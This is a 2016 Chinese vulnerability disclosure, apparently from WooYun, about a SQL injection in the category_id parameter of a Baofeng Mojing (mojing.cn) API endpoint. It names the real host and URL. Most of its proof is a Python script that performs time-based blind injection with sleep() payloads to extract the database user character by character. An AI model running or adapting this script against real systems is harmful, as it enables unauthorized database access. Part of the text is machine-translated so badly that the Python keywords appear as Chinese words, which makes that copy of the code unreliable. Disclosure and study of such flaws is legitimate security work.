暴风魔镜某接口SQL注入(附验证脚本)

漏洞标题 暴风魔镜某接口SQL注入(附验证脚本) 相关厂商 mojing.cn 漏洞作者 fuckadmin 提交时间 2016-05-04 18:59 公开时间 2016-06-18 19:30 漏…

漏洞标题 Storm镜像接口SQL注入(带验证脚本) 相关制造商 Mojing.cn 漏洞作者 Fuckadmin 提交时间 2016-05-04 18: 59 公共时间 2016-06-18 19: 30 漏洞类型 SQL注入漏洞 危险等级 在 自我评估等级 10 漏洞状态 制造商已确认 标签标签 漏洞详细信息 http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016 其中category_id存在注入

漏洞证明: [完成] MySQL用户是[电子邮件 保护]/*% #编码=UTF-8 导入httplib 进口时间 导入字符串 导入系统 随机导入 导入urllib 标题={} Payloads='abcdefghijklmnopqrstuvwxyz0123456789 @ _。' 打印'[%s]开始重试MySQL用户:'%time.strftime('%H:%M:%S',time.localtime()) 用户='' 对于范围(1,24):中的i 对于有效负载:中的有效负载 试试: s='ascii(mid(lower(user()),%s,1))=%s'%(i,ord(payload)) s='aaa'XOR(if(%s,sleep(5),0))OR'bbb'%s Conn=httplib.HTTPConnection('mj.cms.mojing.cn',timeout=3) Conn.request(method='GET',url='/api/v1/vr_market/source_list.php?source_type=2& category_id=%s'%urllib.quote(s)) Conn.getresponse() Conn.close() 打印'。', 除了: 用户+=有效负载 用户,打印'\ n [进行中]' Time.sleep(5.0) 打破 打印'\ n [完成] MySQL用户是%s'%用户 修理计划: 参数过滤 版权声明:请注明来源fuckadmin @乌云